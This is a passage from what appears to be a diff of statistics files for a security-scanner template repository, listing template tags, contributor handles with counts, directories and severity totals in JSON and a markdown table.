enhab","count":1},{"name":"cerber","count":1},{"name":"bludit","count":1},{"name":"biometrics","count":1},{"name":"speedrun","count":1},{"name":"bws-google-analytics","count":1},{"name":"sharepoint_server","count":1},{"name":"lobsters","count":1},{"name":"omlet","count":1},{"name":"bing","count":1},{"name":"notificationx-sql-injection","count":1},{"name":"sinema","count":1},{"name":"librenms","count":1},{"name":"ourmgmt3","count":1},{"name":"sar2html","count":1},{"name":"keybase","count":1},{"name":"poweredbygaysocial-mastodon-instance","count":1},{"name":"sicom","count":1},{"name":"stats","count":1},{"name":"idera","count":1},{"name":"prexview","count":1},{"name":"sslmate","count":1},{"name":"shadoweb","count":1},{"name":"uptime","count":1},{"name":"xfinity","count":1},{"name":"pagekit","count":1},{"name":"bullwark","count":1},{"name":"g-auto-hyperlink","count":1},{"name":"latency","count":1},{"name":"opencollective","count":1},{"name":"teamtreehouse","count":1},{"name":"contactform","count":1},{"name":"transmission","count":1},{"name":"ellipsis-human-presence-technology","count":1},{"name":"ind780","count":1},{"name":"report","count":1},{"name":"cmseasy","count":1},{"name":"cgit","count":1},{"name":"tracing","count":1},{"name":"qlik","count":1},{"name":"researchgate","count":1},{"name":"sfd","count":1},{"name":"mpftvc","count":1},{"name":"formcraft3","count":1},{"name":"cudatel","count":1},{"name":"saltgui","count":1},{"name":"buymeacoffee","count":1},{"name":"twitter-archived-tweets","count":1},{"name":"dradis","count":1},{"name":"asgaros-forum","count":1},{"name":"forms","count":1},{"name":"syncthru","count":1},{"name":"wpb-show-core","count":1},{"name":"httpbrowser","count":1},{"name":"gist","count":1},{"name":"linuxorgru","count":1},{"name":"screenshot","count":1},{"name":"iq-block-country","count":1},{"name":"obsidian","count":1},{"name":"harvardart","count":1},{"name":"readthedocs","count":1},{"name":"epweb","count":1},{"name":"shoowbiz","count":1},{"name":"wishpond","count":1},{"name":"cve2002","count":1},{"name":"free5gc","count":1},{"name":"batflat","count":1},{"name":"flahscookie","count":1},{"name":"campaignmonitor","count":1},{"name":"caldotcom","count":1},{"name":"nvrsolo","count":1},{"name":"sunshine","count":1},{"name":"learning-management-system","count":1},{"name":"accent","count":1},{"name":"self-signed","count":1},{"name":"behance","count":1},{"name":"masa","count":1},{"name":"proxykingdom","count":1},{"name":"autocomplete","count":1},{"name":"chuangtian","count":1},{"name":"nihbuatjajan","count":1},{"name":"flexbe","count":1},{"name":"miracle","count":1},{"name":"bsphp","count":1},{"name":"taxonomies-change-checkbox-to-radio-buttons","count":1},{"name":"mysqld","count":1},{"name":"roblox","count":1},{"name":"kodexplorer","count":1},{"name":"fabswingers","count":1},{"name":"furiffic","count":1},{"name":"h5s","count":1},{"name":"ipanel","count":1},{"name":"zk-framework","count":1},{"name":"moleculer","count":1},{"name":"travel","count":1},{"name":"pretty-url","count":1},{"name":"gyra","count":1},{"name":"bun","count":1},{"name":"taiwanese","count":1},{"name":"hugging-face","count":1},{"name":"insanejournal","count":1},{"name":"uservoice","count":1},{"name":"sitefinity","count":1},{"name":"siteomat","count":1},{"name":"emobile","count":1},{"name":"hiberworld","count":1},{"name":"ncbi","count":1},{"name":"farkascity","count":1},{"name":"acme","count":1},{"name":"kadence-blocks","count":1},{"name":"gpon","count":1},{"name":"directadmin","count":1},{"name":"tumblr","count":1},{"name":"getresponse","count":1},{"name":"cvms","count":1},{"name":"eventon","count":1},{"name":"alma","count":1},{"name":"zapier","count":1},{"name":"pulmi","count":1},{"name":"skywalking","count":1},{"name":"webeditors","count":1},{"name":"isams","count":1},{"name":"nsicg","count":1},{"name":"darktrace","count":1},{"name":"intelbras","count":1},{"name":"bitrat","count":1},{"name":"hanwang","count":1},{"name":"teamspeak3","count":1},{"name":"checkmarx","count":1},{"name":"ictprotege","count":1},{"name":"enrollment","count":1},{"name":"patronite","count":1},{"name":"racksnet","count":1},{"name":"viaware","count":1},{"name":"hacker-news","count":1}],"authors":[{"name":"dhiyaneshdk","count":1088},{"name":"dwisiswant0","count":798},{"name":"daffainfo","count":787},{"name":"pikpikcu","count":353},{"name":"pussycat0x","count":298},{"name":"pdteam","count":283},{"name":"ritikchaddha","count":275},{"name":"ricardomaia","count":226},{"name":"theamanrawat","count":221},{"name":"geeknik","count":221},{"name":"r3y3r53","count":196},{"name":"0x_akoko","count":179},{"name":"princechaddha","count":161},{"name":"gy741","count":153},{"name":"sleepingbag945","count":132},{"name":"arafatansari","count":119},{"name":"tess","count":109},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":63},{"name":"akincibor","count":58},{"name":"pdresearch","count":57},{"name":"for3stco1d","count":55},{"name":"righettod","count":55},{"name":"iamnoooob","count":48},{"name":"philippedelteil","count":46},{"name":"gaurang","count":42},{"name":"edoardottt","count":41},{"name":"rootxharsh","count":41},{"name":"c-sh0","count":35},{"name":"j4vaovo","count":32},{"name":"adam crosser","count":31},{"name":"luisfelipe146","count":31},{"name":"johnk3r","count":28},{"name":"ice3man","count":26},{"name":"pwnhxl","count":25},{"name":"hardik-solanki","count":24},{"name":"organiccrap","count":24},{"name":"techbrunchfr","count":23},{"name":"harsh","count":23},{"name":"ffffffff0x","count":22},{"name":"ctflearner","count":21},{"name":"cckuailong","count":18},{"name":"sullo","count":18},{"name":"parthmalhotra","count":17},{"name":"0xpugazh","count":16},{"name":"shaikhyaser","count":16},{"name":"random-robbie","count":16},{"name":"lu4nx","count":16},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"r3dg33k","count":14},{"name":"tenbird","count":14},{"name":"milo2012","count":14},{"name":"0ri2n","count":13},{"name":"nullfuzz","count":13},{"name":"sharath","count":13},{"name":"melbadry9","count":13},{"name":"theabhinavgaur","count":13},{"name":"suman_kar","count":12},{"name":"meme-lord","count":12},{"name":"dogasantos","count":12},{"name":"wdahlenb","count":11},{"name":"elsfa7110","count":11},{"name":"rxerium","count":11},{"name":"cyllective","count":11},{"name":"co5mos","count":10},{"name":"alph4byt3","count":10},{"name":"hackergautam","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"logicalhunter","count":10},{"name":"olearycrew","count":9},{"name":"fabaff","count":9},{"name":"momika233","count":9},{"name":"emadshanab","count":9},{"name":"oppsec","count":9},{"name":"0x240x23elu","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"mastercho","count":8},{"name":"veshraj","count":8},{"name":"irshad ahamed","count":8},{"name":"_0xf4n9x_","count":8},{"name":"noraj","count":8},{"name":"that_juan_","count":8},{"name":"its0x08","count":7},{"name":"dr_set","count":7},{"name":"leovalcante","count":7},{"name":"caspergn","count":7},{"name":"adamcrosser","count":7},{"name":"randomstr1ng","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"divya_mudgal","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"huta0","count":7},{"name":"amit-jd","count":7},{"name":"techryptic (@tech)","count":7},{"name":"devang-solanki","count":6},{"name":"forgedhallpass","count":6},{"name":"imnightmaree","count":6},{"name":"bhutch","count":6},{"name":"__fazal","count":6},{"name":"gitlab red team","count":6},{"name":"xelkomy","count":6},{"name":"pathtaga","count":6},{"name":"pentest_swissky","count":6},{"name":"clem9669","count":6},{"name":"evan rubinstein","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"nodauf","count":6},{"name":"puzzlepeaches","count":6},{"name":"ja1sh","count":6},{"name":"justaacat","count":6},{"name":"podalirius","count":5},{"name":"kh4sh3i","count":5},{"name":"prajiteshsingh","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"r12w4n","count":5},{"name":"s0obi","count":5},{"name":"defr0ggy","count":5},{"name":"powerexploit","count":5},{"name":"kazet","count":5},{"name":"panch0r3d","count":5},{"name":"vicrack","count":5},{"name":"andreluna","count":5},{"name":"joanbono","count":5},{"name":"robotshell","count":5},{"name":"mr-xn","count":5},{"name":"shine","count":5},{"name":"lum8rjack","count":4},{"name":"ggranjus","count":4},{"name":"megamansec","count":4},{"name":"incogbyte","count":4},{"name":"r3naissance","count":4},{"name":"3th1c_yuk1","count":4},{"name":"arm!tage","count":4},{"name":"h1ei1","count":4},{"name":"e_schultze_","count":4},{"name":"wisnupramoedya","count":4},{"name":"dolev farhi","count":4},{"name":"scent2d","count":4},{"name":"dadevel","count":4},{"name":"shankar acharya","count":4},{"name":"tanq16","count":4},{"name":"shifacyclewala","count":3},{"name":"vsh00t","count":3},{"name":"unstabl3","count":3},{"name":"ambassify","count":3},{"name":"ekrause","count":3},{"name":"impramodsargar","count":3},{"name":"parth","count":3},{"name":"fxploit","count":3},{"name":"randomrobbie","count":3},{"name":"whoever","count":3},{"name":"me9187","count":3},{"name":"splint3r7","count":3},{"name":"heeress","count":3},{"name":"emenalf","count":3},{"name":"_generic_human_","count":3},{"name":"badboycxcc","count":3},{"name":"k0pak4","count":3},{"name":"skeltavik","count":3},{"name":"evergreencartoons","count":3},{"name":"xianke","count":3},{"name":"thomas_from_offensity","count":3},{"name":"taielab","count":3},{"name":"lark-lab","count":3},{"name":"0w4ys","count":3},{"name":"alifathi-h1","count":3},{"name":"matt galligan","count":3},{"name":"true13","count":3},{"name":"hahwul","count":3},{"name":"mavericknerd","count":3},{"name":"jarijaas","count":3},{"name":"imjust0","count":3},{"name":"ph33r","count":3},{"name":"cheesymoon","count":3},{"name":"atomiczsec","count":3},{"name":"z3bd","count":3},{"name":"dr0pd34d","count":3},{"name":"f1tz","count":3},{"name":"andydoering","count":3},{"name":"lucasljm2001","count":3},{"name":"nybble04","count":3},{"name":"arcc","count":3},{"name":"farish","count":3},{"name":"sushantkamble","count":3},{"name":"bernardofsr","count":3},{"name":"fyoorer","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"canberbamber","count":3},{"name":"swissky","count":3},{"name":"johnjhacking","count":3},{"name":"binaryfigments","count":3},{"name":"vagnerd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"huowuzhao","count":3},{"name":"dudez","count":3},{"name":"m4lwhere","count":3},{"name":"davidmckennirey","count":3},{"name":"d4vy","count":2},{"name":"h0j3n","count":2},{"name":"koti2","count":2},{"name":"bing0o","count":2},{"name":"martincodes-de","count":2},{"name":"danielmofer","count":2},{"name":"coldfish","count":2},{"name":"streetofhackerr007","count":2},{"name":"github.com/its0x08","count":2},{"name":"thevillagehacker","count":2},{"name":"8arthur","count":2},{"name":"nkxxkn","count":2},{"name":"foulenzer","count":2},{"name":"dheerajmadhukar","count":2},{"name":"shelled","count":2},{"name":"g4l1t0","count":2},{"name":"z0ne","count":2},{"name":"gal nagli","count":2},{"name":"hetroublemakr","count":2},{"name":"dbrwsky","count":2},{"name":"afaq","count":2},{"name":"gevakun","count":2},{"name":"mohammedsaneem","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"kishore-hariram","count":2},{"name":"uomogrande","count":2},{"name":"notnotnotveg","count":2},{"name":"codexlynx","count":2},{"name":"brenocss","count":2},{"name":"j3ssie","count":2},{"name":"socketz","count":2},{"name":"666asd","count":2},{"name":"y4er","count":2},{"name":"0xnirvana","count":2},{"name":"0xrudra","count":2},{"name":"0xcrypto","count":2},{"name":"bsysop","count":2},{"name":"sbani","count":2},{"name":"v0idc0de","count":2},{"name":"brucelsone","count":2},{"name":"geekby","count":2},{"name":"supras","count":2},{"name":"luci","count":2},{"name":"dahse89","count":2},{"name":"c3l3si4n","count":2},{"name":"parzival","count":2},{"name":"smaranchand","count":2},{"name":"sascha brendel","count":2},{"name":"kre80r","count":2},{"name":"raesene","count":2},{"name":"redteambrasil","count":2},{"name":"nuk3s3c","count":2},{"name":"rafaelwdornelas","count":2},{"name":"pxmme1337","count":2},{"name":"clarkvoss","count":2},{"name":"convisoappsec","count":2},{"name":"cocxanh","count":2},{"name":"joshua rogers","count":2},{"name":"paradessia","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"korteke","count":2},{"name":"kiblyn11","count":2},{"name":"joshlarsen","count":2},{"name":"0xelkomy","count":2},{"name":"joeldeleep","count":2},{"name":"lotusdll","count":2},{"name":"bp0lr","count":2},{"name":"zy9ard3","count":2},{"name":"vavkamil","count":2},{"name":"thezakman","count":2},{"name":"k11h-de","count":2},{"name":"zomsop82","count":2},{"name":"hackerarpan","count":2},{"name":"moritz nentwig","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"0xsapra","count":2},{"name":"n-thumann","count":2},{"name":"0xsmiley","count":2},{"name":"florianmaak","count":2},{"name":"bananabr","count":2},{"name":"ep1csage","count":2},{"name":"cckuakilong","count":2},{"name":"x1m_martijn","count":2},{"name":"thardt-praetorian","count":2},{"name":"ehsahil","count":2},{"name":"gtrrnr","count":2},{"name":"lucky0x0d","count":2},{"name":"ayadim","count":2},{"name":"randomdhiraj","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"dogancanbakir","count":2},{"name":"e1a","count":2},{"name":"w4cky_","count":2},{"name":"myztique","count":2},{"name":"amsda","count":2},{"name":"nvn1729","count":2},{"name":"wa1tf0rme","count":2},{"name":"sy3omda","count":2},{"name":"sinkettu","count":2},{"name":"ajaysenr","count":2},{"name":"paperpen","count":2},{"name":"udit_thakkur","count":2},{"name":"maximus decimus","count":2},{"name":"ree4pwn","count":2},{"name":"manas_harsh","count":2},{"name":"hotpot","count":1},{"name":"freakyclown","count":1},{"name":"aayush vishnoi","count":1},{"name":"unknown","count":1},{"name":"regala_","count":1},{"name":"evan rubinstien","count":1},{"name":"mzack9999","count":1},{"name":"bjhulst","count":1},{"name":"am0nt31r0","count":1},{"name":"calumjelrick","count":1},{"name":"retr0","count":1},{"name":"luqmaan hadia","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"bywalks","count":1},{"name":"alevsk","count":1},{"name":"b0rn2r00t","count":1},{"name":"kr1shna4garwal","count":1},{"name":"httpvoid","count":1},{"name":"undefl0w","count":1},{"name":"colbyjack1134","count":1},{"name":"akokonunes","count":1},{"name":"liquidsec","count":1},{"name":"professorabhay","count":1},{"name":"pjborah","count":1},{"name":"5up3r541y4n","count":1},{"name":"sickwell","count":1},{"name":"yashgoti","count":1},{"name":"akshansh","count":1},{"name":"izn0u","count":1},{"name":"kagamigawa","count":1},{"name":"kchason","count":1},{"name":"carrot2","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"wabafet","count":1},{"name":"sec_hawk","count":1},{"name":"marcos_iaf","count":1},{"name":"b4uh0lz","count":1},{"name":"notsoevilweasel","count":1},{"name":"pphuahua","count":1},{"name":"tim_koopmans","count":1},{"name":"elmahdi","count":1},{"name":"zinminphy0","count":1},{"name":"dorkerdevil","count":1},{"name":"jas37","count":1},{"name":"rodnt","count":1},{"name":"furkansayim","count":1},{"name":"majidmc2","count":1},{"name":"knassar702","count":1},{"name":"caon","count":1},{"name":"elitebaz","count":1},{"name":"mukundbhuva","count":1},{"name":"official_blackhat13","count":1},{"name":"jbaines-r7","count":1},{"name":"zsusac","count":1},{"name":"droberson","count":1},{"name":"tarunkoyalwar","count":1},{"name":"numan türle","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"vzamanillo","count":1},{"name":"erethon","count":1},{"name":"ipanda","count":1},{"name":"pratik khalane","count":1},{"name":"shreyapohekar","count":1},{"name":"rotembar","count":1},{"name":"affix","count":1},{"name":"y0no","count":1},{"name":"matt miller","count":1},{"name":"ooooooo_q","count":1},{"name":"bughuntersurya","count":1},{"name":"hakluke","count":1},{"name":"tea","count":1},{"name":"tehtbl","count":1},{"name":"petruknisme","count":1},{"name":"furkansenan","count":1},{"name":"amanrawat","count":1},{"name":"kresec","count":1},{"name":"phyr3wall","count":1},{"name":"_darrenmartyn","count":1},{"name":"juliosmelo","count":1},{"name":"evolutionsec","count":1},{"name":"hczdmr","count":1},{"name":"_c0wb0y_","count":1},{"name":"rotemreiss","count":1},{"name":"exid","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dawid-czarnecki","count":1},{"name":"retr02332","count":1},{"name":"lingtren","count":1},{"name":"arall","count":1},{"name":"0xceeb","count":1},{"name":"nuts7","count":1},{"name":"blckraven","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"aaban solutions","count":1},{"name":"noamrathaus","count":1},{"name":"mrharshvardhan","count":1},{"name":"momen eldawakhly","count":1},{"name":"nerrorsec","count":1},{"name":"pussycat0","count":1},{"name":"alperenkesk","count":1},{"name":"pdp","count":1},{"name":"miryangjung","count":1},{"name":"mr. bobo hp","count":1},{"name":"ph33rr","count":1},{"name":"stupidfish","count":1},{"name":"philippdelteil","count":1},{"name":"flag007","count":1},{"name":"manuelbua","count":1},{"name":"metascan","count":1},{"name":"clment cruchet","count":1},{"name":"kiks7","count":1},{"name":"topscoder","count":1},{"name":"gboddin","count":1},{"name":"dale clarke","count":1},{"name":"jiheon-dev","count":1},{"name":"j33n1k4","count":1},{"name":"imhunterand","count":1},{"name":"zn9988","count":1},{"name":"ramondunker","count":1},{"name":"noobexploiter","count":1},{"name":"sttlr","count":1},{"name":"sshell","count":1},{"name":"pepitoh","count":1},{"name":"alexrydzak","count":1},{"name":"shockwave","count":1},{"name":"lethargynavigator","count":1},{"name":"ruppde","count":1},{"name":"r3nz0","count":1},{"name":"zhenwarx","count":1},{"name":"exceed","count":1},{"name":"miroslavsotak","count":1},{"name":"therealtoastycat","count":1},{"name":"arqsz","count":1},{"name":"1nf1n7y","count":1},{"name":"dk999","count":1},{"name":"ilovebinbash","count":1},{"name":"fpatrik","count":1},{"name":"naglis","count":1},{"name":"chron0x","count":1},{"name":"ldionmarcil","count":1},{"name":"kailashbohara","count":1},{"name":"spac3wh1te","count":1},{"name":"xshuden","count":1},{"name":"arr0way","count":1},{"name":"un-fmunozs","count":1},{"name":"th3r4id","count":1},{"name":"berkdusunur","count":1},{"name":"chetgan","count":1},{"name":"ndmalc","count":1},{"name":"cookiehanhoan","count":1},{"name":"xeldax","count":1},{"name":"daviey","count":1},{"name":"makyotox","count":1},{"name":"vinit989","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"godfatherorwa","count":1},{"name":"whynotke","count":1},{"name":"ynnirc","count":1},{"name":"shiva (strobes security)","count":1},{"name":"ringo","count":1},{"name":"yuansec","count":1},{"name":"deena","count":1},{"name":"0ut0fb4nd","count":1},{"name":"nytr0gen","count":1},{"name":"myst7ic","count":1},{"name":"jaimin gondaliya","count":1},{"name":"andysvints","count":1},{"name":"hardik-rathod","count":1},{"name":"revblock","count":1},{"name":"hakimkt","count":1},{"name":"jaskaran","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thabisocn","count":1},{"name":"jrolf","count":1},{"name":"d0rkerdevil","count":1},{"name":"screamy","count":1},{"name":"schniggie","count":1},{"name":"ola456","count":1},{"name":"jteles","count":1},{"name":"shifacyclewla","count":1},{"name":"erikowen","count":1},{"name":"unkl4b","count":1},{"name":"nielsing","count":1},{"name":"vikas kundu","count":1},{"name":"thelicato","count":1},{"name":"udinchan","count":1},{"name":"h4kux","count":1},{"name":"carlosvieira","count":1},{"name":"ahmed sherif","count":1},{"name":"soyelmago","count":1},{"name":"oscarintherocks","count":1},{"name":"aringo","count":1},{"name":"nagli","count":1},{"name":"aron molnar","count":1},{"name":"0xtavian","count":1},{"name":"ofjaaah","count":1},{"name":"yusakie","count":1},{"name":"wlayzz","count":1},{"name":"jbertman","count":1},{"name":"realexp3rt","count":1},{"name":"brabbit10","count":1},{"name":"higor melgaço","count":1},{"name":"lixts","count":1},{"name":"thirukrishnan","count":1},{"name":"jeya seelan","count":1},{"name":"remonsec","count":1},{"name":"husain","count":1},{"name":"justmumu","count":1},{"name":"patralos","count":1},{"name":"shivampand3y","count":1},{"name":"abbas.heybati","count":1},{"name":"amnotacat","count":1},{"name":"aringo-bf","count":1},{"name":"arjunchandarana","count":1},{"name":"gpiechnik2","count":1},{"name":"anon-artist","count":1},{"name":"apt-mirror","count":1},{"name":"kareemse1im","count":1},{"name":"skylark-lab","count":1},{"name":"lark lab","count":1},{"name":"hateshape","count":1},{"name":"ramkrishna sawant","count":1},{"name":"petergrifin","count":1},{"name":"ohlinge","count":1},{"name":"mbmy","count":1},{"name":"xstp","count":1},{"name":"mabdullah22","count":1},{"name":"zandros0","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"th3.d1p4k","count":1},{"name":"herry","count":1},{"name":"sherlocksecurity","count":1},{"name":"fq_hsu","count":1},{"name":"brianlam38","count":1},{"name":"arliya","count":1},{"name":"paper-pen","count":1},{"name":"s1r1us","count":1},{"name":"irshadahamed","count":1},{"name":"ling","count":1},{"name":"0xrod","count":1},{"name":"breno_css","count":1},{"name":"micha3lb3n","count":1},{"name":"rojanrijal","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"tirtha","count":1},{"name":"chesterblue","count":1},{"name":"mihhailsokolov","count":1},{"name":"michael wedl","count":1},{"name":"luqman","count":1},{"name":"p-l-","count":1},{"name":"djoevanka","count":1},{"name":"geraldino2","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"mantissts","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"qlkwej","count":1},{"name":"daffianfo","count":1},{"name":"aaronchen0","count":1},{"name":"toufik-airane","count":1},{"name":"jonathanwalker","count":1},{"name":"lady_bug","count":1},{"name":"millermedia","count":1},{"name":"infosecsanyam","count":1},{"name":"push4d","count":1},{"name":"win3zz","count":1},{"name":"mariam tariq","count":1},{"name":"mhdsamx","count":1},{"name":"jub0bs","count":1},{"name":"galoget","count":1},{"name":"couskito","count":1},{"name":"adnanekhan","count":1},{"name":"co0nan","count":1},{"name":"mubassirpatel","count":1},{"name":"8authur","count":1},{"name":"amirmsafari","count":1},{"name":"bad5ect0r","count":1},{"name":"sak1","count":1},{"name":"exploitation","count":1},{"name":"0xceba","count":1},{"name":"iphantasmic","count":1},{"name":"dabla","count":1},{"name":"mrcl0wnlab","count":1},{"name":"ransomsec","count":1},{"name":"x6263","count":1},{"name":"luskabol","count":1},{"name":"hanlaomo","count":1},{"name":"tirtha_mandal","count":1},{"name":"danfaizer","count":1},{"name":"flx","count":1},{"name":"sinsinology","count":1},{"name":"pbuff07","count":1},{"name":"kiransau","count":1},{"name":"hazana","count":1},{"name":"andirrahmani1","count":1},{"name":"marcio mendes","count":1},{"name":"fopina","count":1},{"name":"piyushchhiroliya","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"queencitycyber","count":1},{"name":"hexcat","count":1},{"name":"yashanand155","count":1},{"name":"mayankpandey01","count":1},{"name":"aravind","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"allenwest24","count":1},{"name":"davidfegyver","count":1},{"name":"ayadi","count":1},{"name":"mass0ma","count":1},{"name":"w0tx","count":1},{"name":"qianbenhyu","count":1},{"name":"noah @thesubtlety","count":1},{"name":"jcockhren","count":1},{"name":"esonhugh","count":1},{"name":"supr4s","count":1},{"name":"palanichamy_perumal","count":1},{"name":"lrtk-coder","count":1},{"name":"0h1in9e","count":1},{"name":"ok_bye_now","count":1},{"name":"dievus","count":1},{"name":"guax1","count":1},{"name":"charanrayudu","count":1},{"name":"jacalynli","count":1},{"name":"thebinitghimire","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"alex","count":1},{"name":"kurohost","count":1},{"name":"willd96","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"xcapri","count":1},{"name":"aresx","count":1},{"name":"dali","count":1},{"name":"osamahamad","count":1},{"name":"booboohq","count":1},{"name":"secthebit","count":1},{"name":"technicaljunkie","count":1},{"name":"shiar","count":1},{"name":"viniciuspereiras","count":1},{"name":"zeyad azima","count":1},{"name":"0xprial","count":1},{"name":"ahmed abou-ela","count":1},{"name":"lamscun","count":1},{"name":"cbadke","count":1},{"name":"axrk","count":1},{"name":"jeya.seelan","count":1},{"name":"failopen","count":1},{"name":"kabirsuda","count":1},{"name":"hlop","count":1},{"name":"mesaglio","count":1},{"name":"yaser_s","count":1},{"name":"duty_1g","count":1},{"name":"0xteles","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"patrick pirker","count":1},{"name":"dhiyaneshdki","count":1},{"name":"_harleo","count":1},{"name":"cravaterouge","count":1},{"name":"bugvsme","count":1},{"name":"narluin","count":1},{"name":"juicypotato1","count":1},{"name":"borna nematzadeh","count":1},{"name":"ahmetpergamum","count":1},{"name":"becivells","count":1},{"name":"2rs3c","count":1},{"name":"igibanez","count":1},{"name":"orpheus","count":1},{"name":"open-sec","count":1},{"name":"pudsec","count":1},{"name":"natto97","count":1},{"name":"jna1","count":1},{"name":"bartu utku sarp","count":1},{"name":"dmartyn","count":1},{"name":"udyz","count":1},{"name":"sicksec","count":1},{"name":"pulsesecurity.co.nz","count":1},{"name":"0xd0ff9","count":1},{"name":"barthy.koeln","count":1},{"name":"kaizensecurity","count":1},{"name":"unp4ck","count":1},{"name":"pascalheidmann","count":1},{"name":"houdinis","count":1},{"name":"intx0x80","count":1},{"name":"omarjezi","count":1},{"name":"elouhi","count":1},{"name":"ptonewreckin","count":1},{"name":"prettyboyaaditya","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"rubina119","count":1},{"name":"harshinsecurity","count":1},{"name":"af001","count":1},{"name":"f1she3","count":1},{"name":"iampritam","count":1},{"name":"adamparsons","count":1},{"name":"dwbzn","count":1},{"name":"bjxsec","count":1},{"name":"adrianmf","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"king-alexander","count":1},{"name":"rivalsec","count":1},{"name":"opencirt","count":1},{"name":"nobody","count":1},{"name":"keni0k","count":1},{"name":"0xh7ml","count":1},{"name":"b0yd","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"elder tao","count":1},{"name":"absshax","count":1},{"name":"danigoland","count":1},{"name":"viondexd","count":1},{"name":"manasmbellani","count":1},{"name":"joaonevess","count":1},{"name":"fmunozs","count":1},{"name":"akash.c","count":1},{"name":"compr00t","count":1},{"name":"omarkurt","count":1},{"name":"yavolo","count":1},{"name":"act1on3","count":1},{"name":"francescocarlucci","count":1},{"name":"jc175","count":1},{"name":"mah3sec_","count":1},{"name":"shelld3v","count":1},{"name":"none","count":1},{"name":"c4sper0","count":1},{"name":"rschio","count":1},{"name":"s1r1u5_","count":1},{"name":"tangxiaofeng7","count":1},{"name":"pry0cc","count":1}],"directory":[{"name":"http","count":6768},{"name":"file","count":310},{"name":"workflows","count":191},{"name":"network","count":119},{"name":"ssl","count":27},{"name":"dns","count":17},{"name":"headless","count":10},{"name":"javascript","count":2},{"name":"TEMPLATES-STATS.json","count":1},{"name":"contributors.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":3275},{"name":"medium","count":1413},{"name":"high","count":1412},{"name":"critical","count":888},{"name":"low","count":234},{"name":"unknown","count":31}],"types":[{"name":"file","count":310},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 7d16691de6..82705bbaeb 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,3450 +1,3966 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1908 | dhiyaneshdk | 882 | http | 5970 | info | 2907 | file | 130 | -| panel | 909 | dwisiswant0 | 796 | workflows | 190 | high | 1298 | dns | 18 | -| wordpress | 787 | daffainfo | 664 | file | 130 | medium | 1076 | | | -| exposure | 692 | pikpikcu | 353 | network | 98 | critical | 717 | | | -| wp-plugin | 678 | pdteam | 280 | ssl | 24 | low | 224 | | | -| xss | 660 | pussycat0x | 258 | dns | 18 | unknown | 27 | | | -| osint | 652 | geeknik | 221 | headless | 9 | | | | | -| tech | 614 | ricardomaia | 220 | cves.json | 1 | | | | | -| edb | 597 | ritikchaddha | 217 | TEMPLATES-STATS.json | 1 | | | | | -| lfi | 557 | 0x_akoko | 179 | contributors.json | 1 | | | | | -| cve2021 | 434 | theamanrawat | 166 | | | | | | | -| rce | 427 | princechaddha | 156 | | | | | | | -| cve2022 | 401 | gy741 | 144 | | | | | | | -| packetstorm | 369 | arafatansari | 119 | | | | | | | -| wpscan | 348 | tess | 109 | | | | | | | -| misconfig | 305 | madrobot | 65 | | | | | | | -| wp | 291 | zzeitlin | 64 | | | | | | | -| unauth | 272 | idealphase | 63 | | | | | | | -| token-spray | 240 | akincibor | 58 | | | | | | | -| cve2020 | 237 | for3stco1d | 55 | | | | | | | -| top-200 | 208 | r3y3r53 | 51 | | | | | | | -| osint-social | 207 | gaurang | 42 | | | | | | | -| authenticated | 204 | righettod | 41 | | | | | | | -| sqli | 203 | philippedelteil | 41 | | | | | | | -| kev | 200 | edoardottt | 40 | | | | | | | -| config | 195 | pdresearch | 39 | | | | | | | -| | 194 | c-sh0 | 35 | | | | | | | -| oast | 169 | adam crosser | 31 | | | | | | | -| token | 157 | iamnoooob | 29 | | | | | | | -| apache | 151 | rootxharsh | 28 | | | | | | | -| cve2018 | 150 | ice3man | 26 | | | | | | | -| iot | 149 | hardik-solanki | 24 | | | | | | | -| cve2019 | 148 | pwnhxl | 24 | | | | | | | -| default-login | 147 | organiccrap | 24 | | | | | | | -| joomla | 136 | techbrunchfr | 23 | | | | | | | -| file | 135 | johnk3r | 23 | | | | | | | -| login | 130 | ffffffff0x | 22 | | | | | | | -| redirect | 115 | j4vaovo | 20 | | | | | | | +| cve | 2239 | dhiyaneshdk | 1088 | http | 6768 | info | 3275 | file | 310 | +| panel | 1018 | dwisiswant0 | 798 | file | 310 | 